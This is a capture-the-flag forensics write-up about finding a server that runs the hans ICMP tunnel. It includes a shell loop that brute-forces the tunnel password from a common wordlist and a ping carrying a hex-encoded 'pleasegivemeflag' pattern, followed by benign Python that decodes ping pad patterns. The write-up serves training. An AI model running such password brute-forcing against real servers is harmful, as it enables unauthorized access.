Tags: forensics icmp
Realize that the server is using hans, software for tunneling over ICMP. This is easy to find by googling "hans icmp".
How to find a password:
Option 1. Based on hans source code, crack the password. See the last lines of solution.py
Option 2. Brute-force:
for PASSWORD in $(<xato-net-10-million-passwords-100.txt); do echo "### $PASSWORD" ; sudo ../src/bin/hans -p "$PASSWORD" -c "$SERVER_IP" -f -v ; done
./hans -p "$PASSWORD" -c "$SERVER_IP" -f -v
>>> s='pleasegivemeflag'
>>> print(''.join([hex(ord(c)).replace('0x','') for c in s]))
706c65617365676976656d65666c6167
ping 192.168.18.1 -p 706c65617365676976656d65666c6167
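An added example (not part of the original writeup or of hans): the hex encoding above as a checked helper, plus recovery of the pad pattern from an ICMP echo request, as one would do when reviewing a capture. The packet is constructed in memory as sample input; the 16-byte timestamp at the start of the data, the 56-byte data size and the ident/seq values are assumptions.

```python
import struct

def pad_pattern(text: str) -> str:
    """Hex string for `ping -p`; ping accepts at most 16 pad bytes."""
    raw = text.encode("ascii")
    if not 1 <= len(raw) <= 16:
        raise ValueError("ping -p takes 1 to 16 pad bytes")
    return raw.hex()

def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words."""
    data += b"\x00" * (len(data) % 2)
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_echo_request(pattern_hex, ident=0x1234, seq=1, size=56, ts_len=16):
    """Constructed sample packet: ICMP echo request whose data is filled with
    the repeating pattern, then the first ts_len bytes hold a (zeroed) timestamp."""
    pat = bytes.fromhex(pattern_hex)
    data = (pat * (size // len(pat) + 1))[:size]
    data = bytes(ts_len) + data[ts_len:]  # assumed timestamp overwrites the fill
    csum = inet_checksum(struct.pack("!BBHHH", 8, 0, 0, ident, seq) + data)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + data

def recover_pattern(icmp: bytes, pat_len=16, ts_len=16) -> bytes:
    """Validate an echo request and return the pad pattern found in its data."""
    typ, code = struct.unpack("!BB", icmp[:2])
    if typ != 8 or code != 0:
        raise ValueError("not an ICMP echo request")
    if inet_checksum(icmp) != 0:  # a valid packet sums to zero with its checksum
        raise ValueError("bad ICMP checksum")
    window = icmp[8 + ts_len: 8 + ts_len + pat_len]
    if len(window) < pat_len:
        raise ValueError("data too short to hold one full pattern")
    shift = ts_len % pat_len  # fill started at data offset 0, so undo the phase
    return window[-shift:] + window[:-shift] if shift else window

if __name__ == "__main__":
    pkt = build_echo_request(pad_pattern("pleasegivemeflag"))
    print(recover_pattern(pkt).decode("ascii"))
```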